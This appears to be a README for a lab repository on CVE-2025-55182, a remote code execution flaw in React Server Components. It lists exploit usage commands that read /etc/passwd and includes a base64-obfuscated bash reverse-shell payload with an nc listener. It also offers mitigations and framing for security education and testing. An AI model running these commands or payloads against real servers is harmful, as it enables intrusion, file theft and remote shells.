## https://sploitus.com/exploit?id=28C4CB73-5A44-5903-A568-FF06BACD544F
# React2Shell - CVE-2025-55182 Lab
A comprehensive laboratory for demonstrating and testing the critical vulnerability **CVE-2025-55182** in React Server Components.
## โ ๏ธ Educational Purpose Only
This repository is intended for:
- Security research and education
- Understanding vulnerability mechanisms
- Testing on your own systems
- Bug bounty hunting preparation
**Do not use against systems you don't own or have explicit permission to test. Unauthorized access is illegal.**
## ๐ด Vulnerability Details
- **CVE ID**: CVE-2025-55182
- **CVSS Score**: 10.0 (Critical)
- **Type**: Unauthenticated Remote Code Execution (RCE)
- **Affected Components**:
- React 19.0.0 - 19.2.0
- Next.js 15.x - 16.x
- **Root Cause**: Unsafe deserialization in React Server Components "Flight" protocol
## โก Capabilities
โ Execute arbitrary commands without authentication
โ Read system files
โ Create and modify files
โ Establish reverse shell connections
โ Achieve full server control
## ๐ Quick Start
### 1. Installation
```bash
npm install --legacy-peer-deps
npm run dev
```
Server will start at `http://localhost:3000`
### 2. Check Vulnerability
```bash
bash check-cve.sh
```
### 3. Running Exploits
```bash
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"
```
### 4. Reverse Shell
```bash
# Terminal 1 - Listener
nc -lvnp 4444
# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"
```
## ๐ Project Structure
```
โโโ app/ # Vulnerable Next.js application
โโโ exploit/ # Working PoC exploit
โ โโโ rce_final.py # Main exploit script
โโโ check-cve.sh # Automated vulnerability checker
โโโ package.json # Vulnerable dependencies
โโโ README.md
```
## ๐ง Technical Details
The vulnerability exists in the deserialization logic of React Server Components payloads. The exploit leverages prototype pollution to execute arbitrary code via `process.mainModule.require('child_process').execSync()`.
### Attack Flow
1. Craft malicious multipart form data
2. Send to vulnerable React application
3. Exploit unsafe deserialization in "Flight" protocol
4. Achieve RCE on the server
## ๐ Impact
- **Confidentiality**: HIGH (read any file)
- **Integrity**: HIGH (modify/create files)
- **Availability**: HIGH (execute denial of service commands)
## โ Mitigation
1. Update React to 19.2.1 or later
2. Update Next.js to 15.0.5+ or 16.0.7+
3. Deploy Web Application Firewall (WAF) rules
4. Monitor server logs for exploitation attempts
5. Use runtime protection mechanisms
## ๐ References
- [react2shell.com](https://react2shell.com)
- [CVE-2025-55182 Details](https://vulners.com/cve/CVE-2025-55182)
- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [CVSS Calculator](https://www.first.org/cvss/calculator/3.1)
## โ๏ธ Legal Disclaimer
This code is provided for educational and authorized security testing purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. Unauthorized access to computer systems is illegal under laws such as the Computer Fraud and Abuse Act (CFAA) and similar legislation in other jurisdictions.
The author assumes no liability for misuse of this information.
## ๐ Learning Outcomes
After working through this lab, you will understand:
- How unsafe deserialization vulnerabilities work
- Prototype pollution attack techniques
- React Server Components architecture
- RCE exploitation methods
- Proper vulnerability disclosure practices